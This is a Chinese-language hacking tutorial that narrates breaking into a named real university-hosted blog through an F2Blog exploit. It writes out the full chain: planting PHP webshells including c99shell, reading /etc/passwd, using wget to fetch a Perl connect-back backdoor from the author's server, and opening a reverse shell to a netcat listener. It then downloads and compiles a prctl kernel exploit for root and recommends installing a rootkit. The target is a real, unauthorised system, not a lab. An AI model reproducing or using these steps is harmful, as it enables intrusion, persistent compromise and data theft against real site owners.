從Web漏洞到Root許可權全展現

仲介交易 HTTP://www.aliyun.com/zixun/aggregation/6858.html">SEO診斷 淘寶客 雲主機 技術大廳

很早就想寫一篇從基本的Web漏洞到最後的Root許可權的全過程展現的文章，但是一直苦於沒有時間，最近比較輕鬆，所以抓緊時間寫出了本文。 廢話不多說了，還是一起來看文章吧。

經常看黑防的朋友一定知道F2Blog的漏洞利用，這次我們講解地就是利用F2Blog拿到WebShell到最後獲得Root的過程，相信這裡面有很多的技巧大家可以學到。

首先到milw0rm.com搜索F2Blog的漏洞利用程式並下載回來。 有了EXP，我們就可以利用Google輕鬆地搜索到很多這樣的程式，我們在結果中隨便挑選一個網站HTTP://www.jwit.edu.tw/~s9246071/blog/作為我們今天的目標。 首先把EXP保存到C:\usr\local\php5，因為我用的是WAPM，大家可以到HTTP://www.wapm.cn/下載。 好了，我們進入PHP的目錄執行EXP，如圖1所示，這就是f2blog.php的運行介面。 根據EXP的要求，我們填寫參數並執行，如圖2所示。 大概等了有3分鐘的時間，出現如圖3所示的畫面就表示我們已經成功了，得到了一個一句話的PHP木馬，位址是HTTP://www.jwit.edu.tw/~s9246071/blog/cache/loveshell.php。

　　拿出lanker寫的ASP&PHP一句話木馬用戶端連接我們可愛的小木馬，如圖4所示，我們就成功地拿到了一個WebShell了。 但是這樣的WebShell畢竟很難受，再利用lanker的用戶端上傳一個大馬上去吧。 我們先得到Web的路徑為「/home3/s9246071/public_html/blog/cache」，有了路徑就可以用上傳功能了，上傳一個c99shell木馬，成功後訪問它，如圖5所示，這台機器真不錯啊， 竟有602G的硬碟容量!我習慣性地看了看自己的許可權，在Command execute裡面輸入「id;uname a」得到了以下的結果：uid=30(wwwrun) gid=8(www) groups=8(www) Linux www 2.6.5-7.257-bigsmp #1 SMP Mon May 15 14:14:14 UTC 2006 i686 i686 i386 GNU/Linux，內核是2.6.5版的，作業系統是SuSe9.0。

　　雖然我們已經有了WebShell，但這還不夠，我們要運行本地的提權工具就必須拿到一個本地的Shell才可以。 在命令裡輸入「cat /etc/passwd」可以得到一些使用者，可以利用流光試一下看看有沒有弱智的使用者，當然我是不會這樣的浪費時間的，而是直接用comeback後門，讓伺服器連接到我自己的機器上。 首先把comeback後門上傳到我的空間HTTP://cnbird.ifastnet.com/comeback.pl，然後在WebShell裡執行命令「wget HTTP://cnbird.ifastnet.com/ comeback.pl -P /tmp」，意思是把comeback.pl下載到「/tmp」目錄下。 瞭解Unix的朋友都應該知道，「/tmp」目錄的許可權是可讀可寫的。 如圖6所示，我們已經把comeback後門成功上傳了，下面在WebShell下執行吧!輸入命令「perl /tmp/comeback.pl」，結果為「Connect Back Backdoor by Ch3m0nZ - Satanic Souls Alv /tmp/comeback.pl [Host] 」，這條命令是告訴我們後門的具體利用方法。 先看一下我自己的IP位址，然後用NC綁定一個埠就OK了。 我本機的IP位址是121.16.23.25，在CMD輸入「nc.exe -vv -l -p 12345」，意思是在本地開一個12345埠，讓遠端機器通過這個埠來連接。 再回到WebShell裡執行「perl /tmp/comeback.pl 121.16.23.25 12345」，如圖7所示，NC已經有反應了，我們就可以在這裡執行Shell了，嘿嘿。 為了讓這個Shell更直觀一些，我直接輸入「bash i」，然後再輸入以下的基本命令：who、w、ls和pwd，這些命令的意義，不懂的朋友可以用Google查找。

這樣我們就得到了一個Shell了，接下來要做的事就是提權了。 Linux有一個PCTRL的本地溢出漏洞，我們就先看一下漏洞描述吧! Linux Kernel的prctl()調用在處理Core Dump時存在漏洞，本機攻擊者可能利用此漏洞提升自己的許可權。 prctl()調用允許未授權進程設置PR_SET_DUMPABLE=2，因此當發生段錯誤時產生的Core檔將被Root使用者擁有。 本地使用者可以創建惡意程式，將Core檔Dump到正常情況下無權寫入的目錄中，這可能導致拒絕服務或獲得Root許可權。 我們到Google搜索這個漏洞的EXP，很快就找到了利用程式prtcl.c，把它放到本地架設的伺服器上。 在Shell裡執行命令「wget HTTP://121.16.23.25/prtcl2.c」，就可以成功上傳到伺服器了，下面開始編譯執行吧。 由於這個漏洞程式需要靜態的編譯，所以執行命令「gcc prtcl2.c -o local -static Wall」，編譯成功後，我們輸入wwwrun@www:/tmp>./local，程式就開始執行了，等待1分鐘左右的時間 ，輸入命令「id」，可以發現這個時候我們已經是Root許可權了，如圖8所示。

剩下的事情就是裝個Rootkit了，目前比較經典的有Adore-NG、SK2.0等，安裝方法這裡就不再介紹了。 如果有不熟悉Rootkit的朋友，可以參考網上的一篇很經典的Rootkit文章，其位址HTTP://baoz.net/html/document/200603/1143618484.html，希望能對大家有所説明。